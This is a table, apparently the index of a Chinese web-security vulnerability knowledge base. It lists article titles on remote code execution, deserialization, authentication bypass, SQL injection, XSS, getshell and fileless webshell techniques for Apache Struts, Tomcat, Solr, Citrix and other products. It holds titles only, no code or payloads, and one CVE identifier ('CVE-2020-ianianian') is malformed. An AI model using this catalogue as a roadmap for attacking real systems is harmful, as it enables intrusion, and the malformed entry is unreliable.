| 26   | Web安全 | Apache Flink                   | {'id': 5616, 'name': 'Apache Flink Dashboard 未授权访问-远程代码命令执行', 'pid': 9, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5616, 'title': None}                                                           |
| 27   | Web安全 | Apache FusionAuth              | {'id': 5617, 'name': '（CVE-2020-7799） Apache FreeMarker模板FusionAuth远程代码执行漏洞', 'pid': 10, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5617, 'title': None}                                          |
| 28   | Web安全 | Apache HTTPD                   | {'id': 5618, 'name': 'Apache HTTPD 多后缀解析漏洞', 'pid': 11, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5618, 'title': None}                                                                           |
| 29   | Web安全 | Apache HTTPD                   | {'id': 5619, 'name': '（CVE-2017-15715）Apache HTTPD 换行解析漏洞', 'pid': 11, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5619, 'title': None}                                                            |
| 30   | Web安全 | Apache JMeter                  | {'id': 6566, 'name': '（CVE-2018-1297）Apache Jmeter RMI 反序列化命令执行漏洞', 'pid': 273, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6566, 'title': None}                                                   |
| 31   | Web安全 | Apache Kylin                   | {'id': 6639, 'name': '（CVE-2020-1956）Apache Kylin 远程命令执行漏洞', 'pid': 288, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6639, 'title': None}                                                          |
| 32   | Web安全 | Apache Kylin                   | {'id': 7206, 'name': '（CVE-2020-13925）Apache Kylin 远程命令执行漏洞', 'pid': 288, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7206, 'title': None}                                                         |
| 33   | Web安全 | Apache Log4j                   | {'id': 5620, 'name': '（CVE-2017-5645）Apache Log4j <= v2.8.1 反序列化漏洞', 'pid': 12, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5620, 'title': None}                                                   |
| 34   | Web安全 | Apache Log4j                   | {'id': 5621, 'name': '（CVE-2019-17571）Apache Log4j <= v1.2.17反序列化漏洞', 'pid': 12, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5621, 'title': None}                                                  |
| 35   | Web安全 | Apache NiFi                    | {'id': 7261, 'name': 'Apache NiFi 远程代码执行漏洞', 'pid': 451, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7261, 'title': None}                                                                          |
| 36   | Web安全 | Apache Ofbiz                   | {'id': 7135, 'name': '（CVE-2020-9496）Apache Ofbiz 远程命令执行漏洞', 'pid': 412, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7135, 'title': None}                                                          |
| 37   | Web安全 | Apache POI                     | {'id': 5622, 'name': '（CVE-2019-12415）Apache POI <= v4.1.0 XXE漏洞', 'pid': 13, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5622, 'title': None}                                                     |
| 38   | Web安全 | Apache ShardingSphere          | {'id': 5623, 'name': '（CVE-2020-1947）Apache ShardingSphere远程代码执行漏洞', 'pid': 14, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5623, 'title': None}                                                   |
| 39   | Web安全 | Apache Shiro                   | {'id': 6638, 'name': '（CVE-2016-4437）Apache Shiro <= v1.2.4 反序列化漏洞', 'pid': 15, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6638, 'title': None}                                                   |
| 40   | Web安全 | Apache Shiro                   | {'id': 5625, 'name': '（CVE-2020-1957）Apache Shiro < v1.5.2 身份认证绕过漏洞', 'pid': 15, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5625, 'title': None}                                                  |
| 41   | Web安全 | Apache Shiro                   | {'id': 6739, 'name': '（CVE-2020-11989）Apache Shiro < v1.5.3 身份认证绕过漏洞', 'pid': 15, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6739, 'title': None}                                                 |
| 42   | Web安全 | Apache Shiro                   | {'id': 7042, 'name': '（CVE-2020-13933）Apache Shiro < v1.6.0 身份认证绕过漏洞', 'pid': 15, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7042, 'title': None}                                                 |
| 43   | Web安全 | Apache Solr                    | {'id': 5626, 'name': 'Apache Solr Velocity模版注入远程命令执行', 'pid': 16, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5626, 'title': None}                                                                 |
| 44   | Web安全 | Apache Solr                    | {'id': 7182, 'name': '（CVE-2017-3163）Apahce Solr 任意文件读取漏洞', 'pid': 16, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7182, 'title': None}                                                            |
| 45   | Web安全 | Apache Solr                    | {'id': 5627, 'name': '（CVE-2017-12629）Apache Solr rce\&xxe 漏洞', 'pid': 16, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5627, 'title': None}                                                        |
| 46   | Web安全 | Apache Solr                    | {'id': 7183, 'name': '（CVE-2017-3164）Apache Solr 服务器端请求伪造漏洞', 'pid': 16, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7183, 'title': None}                                                          |
| 47   | Web安全 | Apache Solr                    | {'id': 5628, 'name': '（CVE-2019-0192）Apache Solr Deserialization 远程代码执行漏洞', 'pid': 16, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5628, 'title': None}                                            |
| 48   | Web安全 | Apache Solr                    | {'id': 5629, 'name': '（CVE-2019-0193）Apache Solr 远程命令执行漏洞', 'pid': 16, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5629, 'title': None}                                                            |
| 49   | Web安全 | Apache Solr                    | {'id': 5630, 'name': '（CVE-2019-12409）Apache Solr 远程命令执行漏洞', 'pid': 16, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5630, 'title': None}                                                           |
| 50   | Web安全 | Apache Solr                    | {'id': 5631, 'name': '（CVE-2019-17558）Apache Solr 代码注入漏洞', 'pid': 16, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5631, 'title': None}                                                             |
| 51   | Web安全 | Apache Solr                    | {'id': 7186, 'name': '（CVE-2020-13957）Apache Solr 未授权访问漏洞', 'pid': 16, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7186, 'title': None}                                                            |
| 52   | Web安全 | Apache SSI                     | {'id': 5632, 'name': 'Apache SSI 远程命令执行漏洞', 'pid': 17, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5632, 'title': None}                                                                            |
| 53   | Web安全 | Apache Spark                   | {'id': 6970, 'name': 'Apache Spark 未授权访问漏洞', 'pid': 368, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6970, 'title': None}                                                                          |
| 54   | Web安全 | Apache Struts                  | {'id': 6517, 'name': 'Apache Struts 漏洞列表快速查阅', 'pid': 268, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6517, 'title': None}                                                                        |
| 55   | Web安全 | Apache Struts                  | {'id': 6515, 'name': '（CVE-2007-4556）S2-001', 'pid': 268, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6515, 'title': None}                                                                         |
| 56   | Web安全 | Apache Struts                  | {'id': 6520, 'name': '（CVE-xxxx-xxxx）S2-002', 'pid': 268, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6520, 'title': None}                                                                         |
| 57   | Web安全 | Apache Struts                  | {'id': 6516, 'name': '（CVE-2008-6504）S2-003', 'pid': 268, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6516, 'title': None}                                                                         |
| 58   | Web安全 | Apache Struts                  | {'id': 6514, 'name': '（CVE-2010-1870）S2-005', 'pid': 268, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6514, 'title': None}                                                                         |
| 59   | Web安全 | Apache Struts                  | {'id': 6513, 'name': '（CVE-2012-0838）S2-007', 'pid': 268, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6513, 'title': None}                                                                         |
| 60   | Web安全 | Apache Struts                  | {'id': 6512, 'name': '（CVE-2012-0391）S2-008', 'pid': 268, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6512, 'title': None}                                                                         |
| 61   | Web安全 | Apache Struts                  | {'id': 6511, 'name': '（CVE-2011-3923）S2-009', 'pid': 268, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6511, 'title': None}                                                                         |
| 62   | Web安全 | Apache Struts                  | {'id': 6510, 'name': '（CVE-2013-1965）S2-012', 'pid': 268, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6510, 'title': None}                                                                         |
| 63   | Web安全 | Apache Struts                  | {'id': 6509, 'name': '（CVE-2013-1966）S2-013', 'pid': 268, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6509, 'title': None}                                                                         |
| 64   | Web安全 | Apache Struts                  | {'id': 6518, 'name': '（ CVE-2013-1966）（CVE-2013-2115）S2-014', 'pid': 268, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6518, 'title': None}                                                         |
| 65   | Web安全 | Apache Struts                  | {'id': 6508, 'name': '（CVE-2013-2135）（CVE-2013-2134）S2-015', 'pid': 268, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6508, 'title': None}                                                          |
| 66   | Web安全 | Apache Struts                  | {'id': 6507, 'name': '（CVE-2013-2251）S2-016', 'pid': 268, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6507, 'title': None}                                                                         |
| 67   | Web安全 | Apache Struts                  | {'id': 6522, 'name': '（CVE-2013-2248）S2-017', 'pid': 268, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6522, 'title': None}                                                                         |
| 68   | Web安全 | Apache Struts                  | {'id': 6506, 'name': '（CVE-2013-4316）S2-019', 'pid': 268, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6506, 'title': None}                                                                         |
| 69   | Web安全 | Apache Struts                  | {'id': 6521, 'name': '（CVE-2016-0785）S2-029', 'pid': 268, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6521, 'title': None}                                                                         |
| 70   | Web安全 | Apache Struts                  | {'id': 6505, 'name': '（CVE-2016-3081）S2-032', 'pid': 268, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6505, 'title': None}                                                                         |
| 71   | Web安全 | Apache Struts                  | {'id': 6504, 'name': '（CVE-2016-3087）S2-033', 'pid': 268, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6504, 'title': None}                                                                         |
| 72   | Web安全 | Apache Struts                  | {'id': 6503, 'name': '（CVE-2016-4438）S2-037', 'pid': 268, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6503, 'title': None}                                                                         |
| 73   | Web安全 | Apache Struts                  | {'id': 6519, 'name': '（CVE-2016-6795）S2-042', 'pid': 268, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6519, 'title': None}                                                                         |
| 74   | Web安全 | Apache Struts                  | {'id': 6502, 'name': '（CVE-2017-5638）S2-045', 'pid': 268, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6502, 'title': None}                                                                         |
| 75   | Web安全 | Apache Struts                  | {'id': 6501, 'name': '（CVE-2017-5638）S2-046', 'pid': 268, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6501, 'title': None}                                                                         |
| 76   | Web安全 | Apache Struts                  | {'id': 6500, 'name': '（CVE-2017-9791）S2-048', 'pid': 268, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6500, 'title': None}                                                                         |
| 77   | Web安全 | Apache Struts                  | {'id': 6499, 'name': '（CVE-2017-9805）S2-052', 'pid': 268, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6499, 'title': None}                                                                         |
| 78   | Web安全 | Apache Struts                  | {'id': 6527, 'name': '（CVE-2017-12611）S2-053', 'pid': 268, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6527, 'title': None}                                                                        |
| 79   | Web安全 | Apache Struts                  | {'id': 6523, 'name': '（CVE-2017-7525）S2-055', 'pid': 268, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6523, 'title': None}                                                                         |
| 80   | Web安全 | Apache Struts                  | {'id': 6524, 'name': '（CVE-2018-1327）S2-056', 'pid': 268, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6524, 'title': None}                                                                         |
| 81   | Web安全 | Apache Struts                  | {'id': 6498, 'name': '（CVE-2018-11776）S2-057', 'pid': 268, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6498, 'title': None}                                                                        |
| 82   | Web安全 | Apache Struts                  | {'id': 7057, 'name': '（CVE-2019-0230）S2-059', 'pid': 268, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7057, 'title': None}                                                                         |
| 83   | Web安全 | Apache Struts                  | {'id': 7294, 'name': '（CVE-2020-17530）S2-061', 'pid': 268, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7294, 'title': None}                                                                        |
| 84   | Web安全 | Apereo CAS                     | {'id': 5633, 'name': 'Apereo CAS v4.X execution参数反序列化漏洞', 'pid': 18, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5633, 'title': None}                                                              |
| 85   | Web安全 | Apache Tomcat                  | {'id': 5974, 'name': 'Apache Tomcat HttpServletRequest中几个解析URL的函数', 'pid': 130, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5974, 'title': None}                                                   |
| 86   | Web安全 | Apache Tomcat                  | {'id': 5975, 'name': 'Apache Tomcat 特殊字符的URL解析', 'pid': 130, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5975, 'title': None}                                                                      |
| 87   | Web安全 | Apache Tomcat                  | {'id': 5976, 'name': 'Apache Tomcat 对URL特殊字符的处理', 'pid': 131, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5976, 'title': None}                                                                     |
| 88   | Web安全 | Apache Tomcat                  | {'id': 5977, 'name': 'Apache Tomcat getRequestURI()的处理', 'pid': 131, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5977, 'title': None}                                                              |
| 89   | Web安全 | Apache Tomcat                  | {'id': 5978, 'name': 'Apache Tomcat getRequestURL()的处理', 'pid': 131, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5978, 'title': None}                                                              |
| 90   | Web安全 | Apache Tomcat                  | {'id': 5979, 'name': 'Apache Tomcat getServletPath()的处理', 'pid': 131, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5979, 'title': None}                                                             |
| 91   | Web安全 | Apache Tomcat                  | {'id': 5980, 'name': 'Apache Tomcat getPathInfo()的处理', 'pid': 131, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5980, 'title': None}                                                                |
| 92   | Web安全 | Apache Tomcat                  | {'id': 5981, 'name': 'Apache Tomcat getContextPath()的处理', 'pid': 131, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5981, 'title': None}                                                             |
| 93   | Web安全 | Apache Tomcat                  | {'id': 5982, 'name': 'Apache Tomcat URL 解析差异性攻击利用', 'pid': 131, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5982, 'title': None}                                                                   |
| 94   | Web安全 | Apache Tomcat                  | {'id': 5973, 'name': '简介', 'pid': 129, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5973, 'title': None}                                                                                            |
| 95   | Web安全 | Apache Tomcat                  | {'id': 5983, 'name': '基于 Apache Tomcat 的内存 Webshell 无文件攻击技术', 'pid': 430, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5983, 'title': None}                                                         |
| 96   | Web安全 | Apache Tomcat                  | {'id': 7184, 'name': 'Apache Tomcat 利用 "进程注入" 实现无文件复活 Webshell', 'pid': 430, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7184, 'title': None}                                                      |
| 97   | Web安全 | Apache Tomcat                  | {'id': 5984, 'name': 'Apache Tomcat 后台爆破', 'pid': 128, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5984, 'title': None}                                                                            |
| 98   | Web安全 | Apache Tomcat                  | {'id': 5985, 'name': 'Apache Tomcat 后台部署war木马getshell', 'pid': 128, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5985, 'title': None}                                                               |
| 99   | Web安全 | Apache Tomcat                  | {'id': 5986, 'name': 'Apache Tomcat 样例目录 session 操纵漏洞', 'pid': 128, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5986, 'title': None}                                                               |
| 100  | Web安全 | Apache Tomcat                  | {'id': 5987, 'name': '（CVE-2016-1240）Apache Tomcat 本地提权漏洞', 'pid': 128, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5987, 'title': None}                                                           |
| 101  | Web安全 | Apache Tomcat                  | {'id': 7039, 'name': '通过 JMX 攻击 Apache Tomcat', 'pid': 128, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7039, 'title': None}                                                                       |
| 102  | Web安全 | Apache Tomcat                  | {'id': 5988, 'name': '（CVE-2016-8735）Apache Tomcat 反序列化漏洞', 'pid': 128, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5988, 'title': None}                                                           |
| 103  | Web安全 | Apache Tomcat                  | {'id': 5989, 'name': '（CVE-2017-12615）Apache Tomcat Put 方法任意文件写入漏洞', 'pid': 128, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5989, 'title': None}                                                  |
| 104  | Web安全 | Apache Tomcat                  | {'id': 5990, 'name': '（CVE-2017-12616）Apache Tomcat 信息泄露', 'pid': 128, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5990, 'title': None}                                                            |
| 105  | Web安全 | Apache Tomcat                  | {'id': 6575, 'name': '（CVE-2017-12617）Apache Tomcat RCE via JSP Upload Bypass', 'pid': 128, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6575, 'title': None}                                       |
| 106  | Web安全 | Apache Tomcat                  | {'id': 5991, 'name': '（CVE-2018-1305）Apache Tomcat 安全绕过漏洞', 'pid': 128, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5991, 'title': None}                                                           |
| 107  | Web安全 | Apache Tomcat                  | {'id': 5992, 'name': '（CVE-2019-0221）Apache Tomcat SSI printenv指令中的XSS', 'pid': 128, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5992, 'title': None}                                              |
| 108  | Web安全 | Apache Tomcat                  | {'id': 5993, 'name': '（CVE-2019-0232）Apache Tomcat 远程命令执行漏洞', 'pid': 128, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5993, 'title': None}                                                         |
| 109  | Web安全 | Apache Tomcat                  | {'id': 5994, 'name': '（CVE-2020-1938）Apache Tomcat 文件包含漏洞', 'pid': 128, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5994, 'title': None}                                                           |
| 110  | Web安全 | Apache Tomcat                  | {'id': 6650, 'name': '（CVE-2020-9484）Apache Tomcat session反序列化漏洞', 'pid': 128, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6650, 'title': None}                                                    |
| 111  | Web安全 | Apache Tomcat                  | {'id': 7198, 'name': '（CVE-2020-13935）Apache Tomcat 拒绝服务漏洞', 'pid': 128, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7198, 'title': None}                                                          |
| 112  | Web安全 | AppWeb                         | {'id': 5634, 'name': '（CVE-2018-8715）AppWeb <=7.0.3 认证绕过漏洞', 'pid': 19, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5634, 'title': None}                                                           |
| 113  | Web安全 | Apache Unomi                   | {'id': 7267, 'name': '（CVE-2020-11975）Apache Unomi 远程命令执行漏洞', 'pid': 446, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7267, 'title': None}                                                         |
| 114  | Web安全 | Apache Unomi                   | {'id': 7245, 'name': '（CVE-2020-13942）Apache Unomi 远程代码执行漏洞', 'pid': 446, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7245, 'title': None}                                                         |
| 115  | Web安全 | Aria2                          | {'id': 5635, 'name': '（CVE-2016-3088）Aria2 任意文件写入漏洞', 'pid': 20, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5635, 'title': None}                                                                  |
| 116  | Web安全 | Atlassian Jira                 | {'id': 7096, 'name': '（CVE-2019-8449）Atlassian Jira 信息泄露漏洞', 'pid': 21, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7096, 'title': None}                                                           |
| 117  | Web安全 | Atlassian Jira                 | {'id': 5790, 'name': '（CVE-2019-8451）Atlassian Jira 未授权SSRF漏洞验证', 'pid': 21, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5790, 'title': None}                                                      |
| 118  | Web安全 | Atlassian Jira                 | {'id': 5636, 'name': '（CVE-2019-11581）Atlassian Jira 远程命令执行漏洞', 'pid': 21, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5636, 'title': None}                                                        |
| 119  | Web安全 | ATutor                         | {'id': 7145, 'name': '（CVE-2019-12169）ATutor学习内容管理系统 任意文件上传漏洞', 'pid': 417, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7145, 'title': None}                                                       |
| 120  | Web安全 | Bolt CMS                       | {'id': 7277, 'name': 'Bolt CMS v3.7.0 反射型xss', 'pid': 459, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7277, 'title': None}                                                                        |
| 121  | Web安全 | Bolt CMS                       | {'id': 7278, 'name': 'Bolt CMS v3.7.0 后台远程代码执行漏洞', 'pid': 459, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7278, 'title': None}                                                                    |
| 122  | Web安全 | Bagecms                        | {'id': 7375, 'name': '（CVE-2019-8421）Bagecms sql注入漏洞', 'pid': 493, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7375, 'title': None}                                                                |
| 123  | Web安全 | BSPHP                          | {'id': 7124, 'name': 'BSPHP 存在未授权访问漏洞', 'pid': 406, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7124, 'title': None}                                                                               |
| 124  | Web安全 | Beescms                        | {'id': 7403, 'name': 'Beescms v4.0 sql注入漏洞', 'pid': 503, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7403, 'title': None}                                                                          |
| 125  | Web安全 | Cacti                          | {'id': 5637, 'name': '（CVE-2020-8813）Cacti v1.2.8 远程命令执行漏洞', 'pid': 22, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5637, 'title': None}                                                           |
| 126  | Web安全 | CatfishCMS                     | {'id': 5638, 'name': 'CatfishCMS 后台csrf', 'pid': 23, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5638, 'title': None}                                                                              |
| 127  | Web安全 | CatfishCMS                     | {'id': 5639, 'name': 'CatfishCMS 后台储存型xss', 'pid': 23, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5639, 'title': None}                                                                            |
| 128  | Web安全 | CatfishCMS                     | {'id': 5640, 'name': 'CatfishCMS v4.5.7 xss', 'pid': 23, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5640, 'title': None}                                                                          |
| 129  | Web安全 | CatfishCMS                     | {'id': 5641, 'name': 'CatfishCMS v4.5.7 csrf getshell', 'pid': 23, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5641, 'title': None}                                                                |
| 130  | Web安全 | CatfishCMS                     | {'id': 5642, 'name': 'CatfishCMS v4.6.15 前台xss', 'pid': 23, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5642, 'title': None}                                                                       |
| 131  | Web安全 | CatfishCMS                     | {'id': 7394, 'name': 'CatfishCMS v4.5.7 越权漏洞', 'pid': 23, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7394, 'title': None}                                                                         |
| 132  | Web安全 | CatfishCMS                     | {'id': 5643, 'name': 'CatfishCMS v4.6.15 后台文件包含getshell', 'pid': 23, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5643, 'title': None}                                                              |
| 133  | Web安全 | CatfishCMS                     | {'id': 5644, 'name': 'CatfishCMS v4.6.15 csrf getshell', 'pid': 23, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5644, 'title': None}                                                               |
| 134  | Web安全 | CatfishCMS                     | {'id': 5645, 'name': '（CNVD-2019-06255）CatfishCMS v4.8.54 远程命令执行', 'pid': 23, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5645, 'title': None}                                                     |
| 135  | Web安全 | Citrix                         | {'id': 5646, 'name': '（CVE-2019-19781）Citrix 远程命令执行漏洞', 'pid': 24, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5646, 'title': None}                                                                |
| 136  | Web安全 | Citrix                         | {'id': 6843, 'name': '（CVE-2020-ianianian）Citrix 目录遍历漏洞', 'pid': 24, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6843, 'title': None}                                                              |
| 137  | Web安全 | Citrix                         | {'id': 6844, 'name': '（CVE-2020-7473）Citrix 认证绕过getshell', 'pid': 24, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6844, 'title': None}                                                             |
| 138  | Web安全 | Citrix                         | {'id': 6837, 'name': '（CVE-2020-8194）Citrix 未授权访问导致的任意代码执行漏洞', 'pid': 24, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6837, 'title': None}                                                         |
| 139  | Web安全 | Citrix                         | {'id': 6838, 'name': '（CVE-2020-8195）Citrix 未授权访问漏洞', 'pid': 24, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6838, 'title': None}                                                                  |
| 140  | Web安全 | Citrix                         | {'id': 6840, 'name': '（CVE-2020-8196）Citrix Nitro API 未授权访问漏洞', 'pid': 24, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6840, 'title': None}                                                        |
| 141  | Web安全 | Citrix                         | {'id': 6842, 'name': '（CVE-2020-8198）Citrix 储存型xss', 'pid': 24, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6842, 'title': None}                                                                   |
| 142  | Web安全 | Citrix                         | {'id': 7249, 'name': '（CVE-2020-8271）（CVE-2020-8272）（CVE-2020-8273）Citrix SD-WAN远程代码执行漏洞', 'pid': 24, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7249, 'title': None}                             |
| 143  | Web安全 | Citrix Xen APP                 | {'id': 7299, 'name': 'Citrix Xen APP 越权访问漏洞', 'pid': 465, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7299, 'title': None}                                                                         |
| 144  | Web安全 | CLTPHP                         | {'id': 7112, 'name': 'CLTPHP v5.8 后台任意文件删除漏洞', 'pid': 402, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7112, 'title': None}                                                                        |
| 145  | Web安全 | CLTPHP                         | {'id': 7113, 'name': 'CLTPHP v5.5.3 任意文件上传漏洞', 'pid': 402, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7113, 'title': None}                                                                        |
| 146  | Web安全 | ClusterEngine                  | {'id': 7362, 'name': 'ClusterEngine v4.0 远程命令执行漏洞', 'pid': 482, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7362, 'title': None}                                                                   |
| 147  | Web安全 | ClusterEngine                  | {'id': 7342, 'name': 'ClusterEngine v4.0 补丁绕过', 'pid': 482, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7342, 'title': None}                                                                       |
| 148  | Web安全 | CmsEasy                        | {'id': 5647, 'name': ' CmsEasy v7.3.8 任意文件操作 ', 'pid': 25, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5647, 'title': None}                                                                        |
| 149  | Web安全 | CmsEasy                        | {'id': 5648, 'name': ' CmsEasy v7.3.8 sql注入漏洞 ', 'pid': 25, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5648, 'title': None}                                                                       |
| 150  | Web安全 | CmsEasy                        | {'id': 5649, 'name': ' CmsEasy v7.3.8 本地文件包含漏洞 ', 'pid': 25, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5649, 'title': None}                                                                      |
| 151  | Web安全 | CmsEasy                        | {'id': 6496, 'name': 'CmsEasy v7.6.3.2\_20200422 逻辑漏洞', 'pid': 25, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6496, 'title': None}                                                                |
| 152  | Web安全 | CmsEasy                        | {'id': 7344, 'name': 'CmsEasy v7.6.9.3\_20200728 前台sql注入漏洞', 'pid': 25, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7344, 'title': None}                                                           |
| 153  | Web安全 | Cobub Razor                    | {'id': 5650, 'name': '（CVE-2018-7720）Cobub Razor v0.7.2 存在跨站请求伪造漏洞', 'pid': 26, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5650, 'title': None}                                                   |
| 154  | Web安全 | Cobub Razor                    | {'id': 5651, 'name': '（CVE-2018-7745）Cobub Razor v0.7.2 越权增加管理员账户', 'pid': 26, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5651, 'title': None}                                                    |
| 155  | Web安全 | Cobub Razor                    | {'id': 5652, 'name': '（CVE-2018-8056/CVE-2018-8770）Cobub Razor v0.8.0 存在物理路径泄露漏洞', 'pid': 26, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5652, 'title': None}                                     |
| 156  | Web安全 | Cobub Razor                    | {'id': 5653, 'name': '（CVE-2018-8057）Cobub Razor v0.8.0 存在SQL注入漏洞', 'pid': 26, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5653, 'title': None}                                                    |
| 157  | Web安全 | Computrols CBAS Web            | {'id': 5654, 'name': '（CVE-2019-10846）Computrols CBAS Web反射型xss', 'pid': 27, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5654, 'title': None}                                                      |
